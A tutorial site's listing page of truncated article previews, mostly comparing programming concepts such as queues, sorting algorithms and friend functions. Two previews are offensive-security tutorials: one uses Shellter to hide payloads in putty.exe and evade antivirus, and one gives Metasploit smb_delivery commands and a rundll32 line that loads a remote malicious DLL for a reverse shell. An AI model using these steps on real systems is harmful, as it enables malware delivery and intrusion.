Found 205 Articles for Computer Programming

Difference Between Link and Association

Updated on 23-Mar-2021 08:01:46

8K+ Views

In this post, we will understand the difference between Link and Association.LinkIt can be understood as the physical connection between objects.It helps tell about the relationship among objects.It is represented using line segment between objects.They can’t be referenced.It is used in UML designs.AssociationIt is a specification about the collection of links.The connections are related to classes.It is a general relationship between classes.They are implemented using programming languages as a reference model.It shows connections between classes using line segments.It is used in UML designs.

Difference Between Friend Function and Friend Class

Updated on 23-Mar-2021 08:01:22

4K+ Views

In this post, we will understand the difference between Friend function and Friend class.Friend FunctionIt is usually used with operator overloading operation.It is used with the ‘friend’ keyword.It helps give a non-member function the access to the private members of the class.It has to be declared before it is used.It is used to access private and protected members of the class.It can be a global function or a function in another class.Exampleclass Node {    private:    int val;    Node* next;    // Other members of Node Class //    friend int LinkedList::search();    // Only search method ... Read More

Difference Between DDA and Bresenham Line Drawing algorithm

Kiran Kumar Panigrahi
Updated on 28-Jul-2022 12:19:02

10K+ Views

The realm of computer graphics is an expansive one that is always undergoing development. It involves a variety of concepts and ideas, of which "drawing a line" is the most fundamental tasks involved in working with graphical media.There are two algorithmic rules that are followed while drawing a line on the screen. They are DDA (Digital Differential Analyser) algorithmic rule and Bresenham line algorithm.Both the DDA and Bresenham's algorithm are examples of computational procedures that can be utilised for the goal of approximating the length of a line segment.What is DDA?The primary purpose of a DDA in computer graphics is ... Read More

Difference Between Server-side Scripting and Clientside Scripting

Updated on 23-Mar-2021 07:38:59

5K+ Views

In this post, we will understand the difference between server-side scripting and client-side scripting.Server-side ScriptingIt helps work with the back end.It doesn’t depend on the client.It runs on the web server.It helps provide a response to every request that comes in from the user/client.This is not visible to the client side of the application.It requires the interaction with the server for the data to be process.Server side scripting requires languages such as PHP,, ColdFusion, Python, Ruby on Rails.It is considered to be a secure way of working with applications.It can be used to customize web pages.It can also be ... Read More

Difference Between Linear Queue and Circular Queue

Updated on 23-Mar-2021 07:14:18

2K+ Views

In this post, we will understand the difference between linear queue and circular queue −Linear QueueIt is a linear data structure, which data is arranged in a linear pattern.Operations such as insertion and deletion are done from rear and front respectively.It requires more memory, since data is stored in a linear fashion.The element that is added to a linear queue at first, is the element that gets deleted first.It follows FIFO, i.e first in first out.The element that is inserted first is the element that is deleted first as well.It is not as efficient as a circular queue structure.Circular QueueThe ... Read More

Difference Between Insertion Sort and Selection Sort

Updated on 23-Mar-2021 07:13:57

2K+ Views

Insertion SortIn Insertion Sort, the values are inserted in a list/array wherein some of the values are previous sorted.It is a stable sorting algorithm.The best case time complexity is O(N) (when the list has been sorted in ascending order).A key value is defined, and the array is iterated from the beginning to the end.The current element during iteration is compared to the key value.The number of comparison operations made during insertion sort is less than the number of the element swapping that is done.If the key element is smaller than the element with which it is being compared, the previous ... Read More

Explain the Difference Between Definition and Declaration

Updated on 23-Mar-2021 07:13:31

2K+ Views

In this post, we will understand the difference between definition and declaration.DefinitionDefinition, with respect to a function indicates that the body of the function has been developed.With respect to variable, it means a value has been associated/defined with that variable.A function can be defined only once.Once a function or variable has been defined, it is ready to be used.A variable can be re-defined multiple times, as and when required. This depends on the language and the scopes.Memory is allocated when function or a variable is defined.Below is an example of variable definitionsum = 0A variable named ‘sum’ is assigned to ... Read More

Bypass Antivirus with Shelter

Ajay yadav
Updated on 23-Sep-2020 12:25:51


Shellter is an active shellcode insertion tool. It effectively re-encodes payloads to bypass anti-virus software. Shellter embeds a 32-bit Windows application and the shellcode in such a way that it goes undetected by the AV software.InstallationYou can install Shellter directly on Kali by using the following command −apt-get install shellterapt-get install wine32How to BypassOpen shelter using wine app, select the operation mode as 'a'.choose an executable file and copy it to the Shellter folder. This is required to be done to bind Shellter with a .exe file. In our case, we have copied the putty.exe file to the Shellter folder ... Read More

Rundll32.exe Attack

Ajay yadav
Updated on 23-Sep-2020 12:23:33


Rundll32.exe is associated with Windows Operating System that allows you to invoke a function exported from a DLL, either 16-bit or 32-bit and store it in proper memory libraries.Launch Rundll32 Attack via SMBMetasploit contains the “SMB Delivery” module which generates malicious dll file. This module serves payloads via an SMB server and provides commands to retrieve and execute the generated payloads.Generate DLL payloaduse exploit/windows/smb/smb_deliverymsf exploit(windows/smb/smb_delivery) > set srvhost IP)msf exploit(windows/smb/smb_delivery) > exploitNow, you execute this generated malicious dll file on the victim machine with the help of rundll32.exe, you will get the reverse connection at your machine.rundll32.exe \\vabFG\test.dll, 0Read More

Difference between Header file and Library

Kiran Kumar Panigrahi
Updated on 21-Feb-2023 14:43:57

7K+ Views

In C, C#, Java or any other programming language, both header files and libraries provide some specific APIs and their functionality to be used in the main file. Both the header file and the library are combined and used as a single unit. But, on the basis of nature of files, we can distinguish between a Header File and a Library. Read this tutorial to learn more about header files and libraries and how they are different from each other. What is a Header File? The file that contains all the header names which are to be used in the ... Read More
